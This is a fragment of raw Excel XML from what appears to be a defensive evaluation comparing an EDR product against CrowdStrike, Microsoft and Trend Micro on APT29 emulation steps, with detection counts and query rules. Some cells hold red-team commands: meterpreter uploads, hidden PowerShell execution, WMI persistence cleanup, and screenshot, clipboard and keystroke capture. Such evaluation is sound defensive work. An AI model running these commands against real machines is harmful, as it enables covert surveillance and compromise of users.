      <t>210WIN10 (20.20.101.210)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> using net.exe</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Network connection to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>210WIN10 (20.20.101.210)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> over port </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>5985</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>CrowStrike</t>
  </si>
  <si>
    <t>Microsoft</t>
  </si>
  <si>
    <t>Trend Micro</t>
  </si>
  <si>
    <t>General
Telemetry
MSSP</t>
  </si>
  <si>
    <t>General
Telemetry</t>
  </si>
  <si>
    <t>MSSP
Telemetry</t>
  </si>
  <si>
    <t>Technique
MSSP
Telemetry</t>
  </si>
  <si>
    <t>Telemetry
MSSP</t>
  </si>
  <si>
    <t>Telemetry
Technique</t>
  </si>
  <si>
    <t>General
MSSP 
Telemetry</t>
  </si>
  <si>
    <t>Technique
MSSP</t>
  </si>
  <si>
    <t>Technique
Telemetry
MSSP</t>
  </si>
  <si>
    <t>Telemetry
Technique 1
Technique 2</t>
  </si>
  <si>
    <t>MSSP</t>
  </si>
  <si>
    <t>Technique
Telemetry</t>
  </si>
  <si>
    <t>Telemetry
MSSP
General</t>
  </si>
  <si>
    <t>Telemetry
General</t>
  </si>
  <si>
    <t>MSSP
Technique
Telemetry</t>
  </si>
  <si>
    <t>Tatic
Telemetry
Technique</t>
  </si>
  <si>
    <t>4 Alert Technique
General</t>
  </si>
  <si>
    <t>6 Alert Technique
2 Alert General</t>
  </si>
  <si>
    <t>Telemetry 
Technique</t>
  </si>
  <si>
    <t>Telemetry 
2 Alert Technique</t>
  </si>
  <si>
    <t>2 Alert Technique
Telemetry</t>
  </si>
  <si>
    <t>General
MSSP</t>
  </si>
  <si>
    <t>Telemetry 
MSSP</t>
  </si>
  <si>
    <t xml:space="preserve">MSSP
None </t>
  </si>
  <si>
    <t>2 Alert Technique
MSSP
Telemetry</t>
  </si>
  <si>
    <t>2 Alert General
MSSP
Telemetry</t>
  </si>
  <si>
    <t>Telemetry
MSSP
Technique</t>
  </si>
  <si>
    <t>Telemetry
MSSP
2 Alert Technique</t>
  </si>
  <si>
    <t>Kết quả</t>
  </si>
  <si>
    <t>Day 1</t>
  </si>
  <si>
    <t>Day 2</t>
  </si>
  <si>
    <t>Thông tin</t>
  </si>
  <si>
    <t>Vendor Reviewed</t>
  </si>
  <si>
    <t>1. Kết quả test của Lab Team:
- Phát hiện: 21/55 hành vi, trong đó:
- 19 hành vi là telemetry
- 1 hành vi dạng alert General
- 1 hành vi dạng alert Technique
3. Các vendors khác:
a. CrownStrike:
- Phát hiện: 45/55 hành vi, trong đó:
- 1 hành vi là dạng alert Tatic
- 3 hành vi là alert dạng general
- 1 hành vi là alert dạng MSSP 
- 24 hành vi là alert dạng Technique 
- 42 hành vi là telemetry
b. Microsoft:
- Phát hiện 52/55 hành vi, trong đó:
- 15 hành vi là alert dạng general
- 20 hành vi là alert dạng MSSP
- 10 hành vi là alert dạng Technique
- 48 hành vi là alert dạng telemetry
c. Trend Micro
- Phát hiện 49/55 hành vi, trong đó:
- 5 hành vi là alert dạng general
- 39 hành vi là alert dạng MSSP
- 17 hành vi là alert dạng Technique
- 47 hành vi là alert dạng telemetry</t>
  </si>
  <si>
    <t>Vendor Review</t>
  </si>
  <si>
    <t>BUG NOTE</t>
  </si>
  <si>
    <t>VCS</t>
  </si>
  <si>
    <t>TrendMicro</t>
  </si>
  <si>
    <t>Detect Type</t>
  </si>
  <si>
    <t>EventID = "3" AND source_process_path ~ "3aka3"</t>
  </si>
  <si>
    <t>CrowdStrike</t>
  </si>
  <si>
    <t>MS</t>
  </si>
  <si>
    <t>General (Alert)</t>
  </si>
  <si>
    <t>Technique (Alert)</t>
  </si>
  <si>
    <t>General 
Telemetry</t>
  </si>
  <si>
    <t>MSSP
Telemetry
Technique</t>
  </si>
  <si>
    <t>MSSP
General</t>
  </si>
  <si>
    <t>Telemetry
Tactic
Technique</t>
  </si>
  <si>
    <t xml:space="preserve">Technique
Telemetry </t>
  </si>
  <si>
    <t>General
Technique
MSSP</t>
  </si>
  <si>
    <t xml:space="preserve">General </t>
  </si>
  <si>
    <t xml:space="preserve">Telemetry
Technique </t>
  </si>
  <si>
    <t xml:space="preserve">None </t>
  </si>
  <si>
    <t>file_path ~ "javamtsup"
EventID = "7045" AND service_target_file_path = "C:\Windows\System32\javamtsup.exe"</t>
  </si>
  <si>
    <t>EventID = "4624" AND user_name = "210WIN10$"  AND source_process_path ~ "C:\Windows\PSEXESVC.exe"</t>
  </si>
  <si>
    <t>EventID = "1" AND target_process_path ~ "powershell" AND source_process_path ~ "python"</t>
  </si>
  <si>
    <t>EventID = "1"  AND target_process_path ~ "sdelete64" AND target_process_id = "32"
sau đó search:
EventID = "11" AND file_path ~ "working.zip" AND source_process_id = "32"</t>
  </si>
  <si>
    <t>EventID = "11" AND file_path ~ "sdelete64" AND source_process_id = "2056"
và
EventID = "1"  AND target_process_id = "2056"</t>
  </si>
  <si>
    <t>EventID = "1" AND target_process_path ~ "javamtsup.exe"</t>
  </si>
  <si>
    <t>EventID = "13" AND reg_value_name ~ "hostui.lnk"</t>
  </si>
  <si>
    <t>MSSP
General
Telemetry</t>
  </si>
  <si>
    <t>Telemetry
Techhnique</t>
  </si>
  <si>
    <t>Telemetry
Technique
MSSP</t>
  </si>
  <si>
    <t>General
MSSP
Telemetry</t>
  </si>
  <si>
    <t>2 Alert General
Telemetry</t>
  </si>
  <si>
    <t>Techinque</t>
  </si>
  <si>
    <t xml:space="preserve">1. Kết quả test của Lab Team:
- Phát hiện: 29/77 hành vi, trong đó:
- 27 hành vi là telemetry
- 2 hành vi là alert (dạng general)
2. Kết quả sau khi team verify:
- Phát hiện: 35/77 hành vi, trong đó:
- 34 hành vi là telemetry
- 2 hành vi là alert (dạng general)
3. Các vendors khác:
a. CrownStrike:
- Phát hiện: 68/77 hành vi, trong đó:
- 3 hành vi là alert dạng general (tức hành vi bất thường nhưng chưa chỉ rõ technique)
- 4 hành vi là alert dạng MSSP (tức hành vi bất thường được chỉ ra bởi người giám sát)
- 13 hành vi là alert dạng Technique (tức chỉ rõ được thuộc Mitre Technique nào)
- 64 hành vi là telemetry (tức chỉ là events)
b. Microsoft:
- Phát hiện 66/77 hành vi, trong đó:
- 5 hành vi là alert dạng general
- 35 hành vi là alert dạng MSSP
- 5 hành vi là alert dạng Technique
- 57 hành vi là alert dạng telemetry
b. TrendMicro:
- Phát hiện 73/77 hành vi, trong đó:
- 7 hành vi là alert dạng general
- 43 hành vi là alert dạng MSSP
- 26 hành vi là alert dạng Technique
- 62 hành vi là alert dạng telemetry
</t>
  </si>
  <si>
    <t>Biểu đồ so sánh VCS-Ajant với các sản phẩm khác:</t>
  </si>
  <si>
    <t>Competitor</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Evidence:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Đối với những hành vi sản phẩm có thể detect được, Evidence sẽ được lưu theo số thứ tự của bước đã thực hiện hành vì đó.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Main detectiion Types</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
+ </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>None</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Không có dữ liệu nào được thu thập, xử lý có liên quan đến hành vi trong thời gian đánh giá. Nếu có dữ liệu nhưng dữ liệu đó không liên quan trực tiếp đến bài đánh giá sẽ được phân loại ở mục None. Đối với trường hợp này vendor có thể sẽ nhận được phân loại "None" kèm theo ghi chú và ảnh chụp màn hình về giữ liệu đó
VD:
Không dữ liệu nào được thu thập liên quan đến hành động đã xảy ra
Alert lên trong thời gian Red Team thực hiện test nhưng không liên quan đến kỹ thuật đang sử dụng để đánh giá
+ </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Telemetry</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Dữ liệu được thu thập chỉ ra được sự kiên đã gây ra hành vi nào trong thời gian đánh giá. Bằng chứng phải thể hiện được hành vi này "đã xảy ra" thay vì chỉ ra "có thể xảy ra". Bằng chứng phải liên quan đến những hành vi đã xảy ra. 
VD: Kết quả của một dòng lệnh chỉ ra rằng một lệnh nhất định đã được chạy trên máy trạm bởi một user nhất định
+ </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>MSSP</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Dữ liệu được đưa ra bởi nhà cung cấp dịch vụ bảo mật hoặc dịch vụ giám sát dựa trên những phân tích của con người về sự cố đã xảy ra. MSSP sẽ được đánh giá delayed vì cần thời gian để phân tích thủ công
VD: Một Email từ phân tích viên chỉ ra một hành động liên quan đến kỹ thuật data exfiltration
+ </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>General</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Dữ liệu chỉ ra được rằng các hành vi độc hại hoặc sự kiện bất thường đã xảy ra có quan hệ với hành vi trong quá trình đánh giá (VD. cmd.exe /c copy cmd.exe sethc.exe, là một hành động bất thường đã xảy ra. Không có hoặc ít thông tin được cung cấp về "lý do" hành động xảy ra (tatic) hoặc thông tin về hành động đó được "thực hiện" như thế nào (technique)
VD:  Alert mô tả "cmd.exe /c copy cmd.exe sethc.exe" là hoạt động bất thường nhưng không chỉ ra được technique cụ thể là Accessibility Features
+ </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Tatic</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Dữ liệu chỉ ra được ATT&amp;CK tatic hoặc giá trị tương đương. Đưa ra được cho phân tích viên những tiềm năng có thể đẻ hỗ trợ phân tích viên trả lời câu hỏi "Tại sao hành động này được thực hiện" (VD: Persistence hoặc Discovery Command)
VD: 
Alert "Malicious Discovery" chỉ ra được tatic nhưng không chỉ ra được cụ thể là loại discovery nào đã được sử dụng
Alert mô tả là persistence nhưng không chỉ ra làm sao để đạt được persistenceư
+ </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Technique</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Dữ liệu chỉ ra được ATT&amp;CK technique hoặc giá trị tương đương về hành động đó đã được thực hiện như thế nào, giúp phân tích viên trả lời được câu hỏi "cái gì đã được thực hiện" (VD:Accessibility Features hoặc Credential Dumping)
VD:
Alert "Credential Dumping" với thông tin đầy đủ chỉ ra rằng chương trình tương tác với lsass.exe hoặc loại credential dumping cụ thể nào được sử dụng.
Alert "Lateral Movement with Service Execution" mô tả dịch vụ nào được sử dụng và hệ thống nào được chọn là mục tiêu.</t>
    </r>
  </si>
  <si>
    <t>VCS-Ajiant</t>
  </si>
  <si>
    <t>1. loadmodule /var/www/webdav/APT29/Day2/S15/stepFifteen_wmi.ps1
2. Execute wmi
Note: If in step 20 implant not fire, Delete old WMIObject and do this step again with below commandline:
#Get-WMIObject -Namespace root/subscription -Class __EventFilter -Filter "Name='WindowsParentalControlMigration'" | Remove-WmiObject -Verbose
#Get-WMIObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name='WindowsParentalControlMigration'" | Remove-WmiObject -Verbose
#Get-WMIObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "__PATH LIKE '%WindowsParentalControlMigration%'" | Remove-WmiObject -Verbose</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.A - Ingress Tool Transfer (T1105)
From Metasploit:
[msf] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>sessions</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[msf] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>sessions -i 1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter*] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>upload /var/www/webdav/APT29/SysinternalsSuite.zip "C:\\Users\\local.admin\\Downloads\\SysinternalsSuite.zip"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>execute -f powershell.exe -i -H</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Expand-Archive -LiteralPath "$env:USERPROFILE\Downloads\SysinternalsSuite.zip" -DestinationPath "$env:USERPROFILE\Downloads\"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>if (-Not (Test-Path -Path "C:\Program Files\SysinternalsSuite")) { Move-Item -Path $env:USERPROFILE\Downloads\SysinternalsSuite -Destination "C:\Program Files" }</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>cd "C:\Program Files\SysinternalsSuite\"</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7.A - User Monitoring (T1113, T1115, T1056 / T1056.001)
[meterpreter*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>execute -f powershell.exe -i -H</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>cd "C:\Program Files\SysinternalsSuite\"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Move-Item .\psversion.txt psversion.ps1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> . .\psversion.ps1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Invoke-ScreenCapture;Start-Sleep -Seconds 3;View-Job -JobName "Screenshot"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
From the Windows victim, type text and copy to the clipboard.
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Get-Clipboard</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Keystroke-Check</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Get-Keystrokes;Start-Sleep -Seconds 15;View-Job -JobName "Keystrokes"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
From victim system, enter keystrokes.
View keylog output from Metasploit:
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">View-Job -JobName "Keystrokes" 
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Remove-Job -Name "Keystrokes" -Force 
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Remove-Job -Name "Screenshot" -Force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</si>
</sst>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24292F"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color theme="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name val="Georgia"/>
      <family val="1"/>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patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="0.39997558519241921"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7"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4" fillId="4" borderId="9" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="51">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"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2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"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3" borderId="1" xfId="0" applyFont="1" applyFill="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Fill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="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1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="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APT-29 Day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Summary!$E$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>VCS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Summary!$E$2:$E$6</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-6DE0-47E5-8CC9-9966FBBED44F}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Summary!$F$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>CrowStrike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Summary!$F$2:$F$6</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-6DE0-47E5-8CC9-9966FBBED44F}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Summary!$G$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Microsoft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Summary!$G$2:$G$6</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-6DE0-47E5-8CC9-9966FBBED44F}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>Summary!$H$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>TrendMicro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Summary!$D$2:$D$6</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>None</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Telemetry</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>General</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Technique</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>MSSP</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Summary!$H$2:$H$6</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
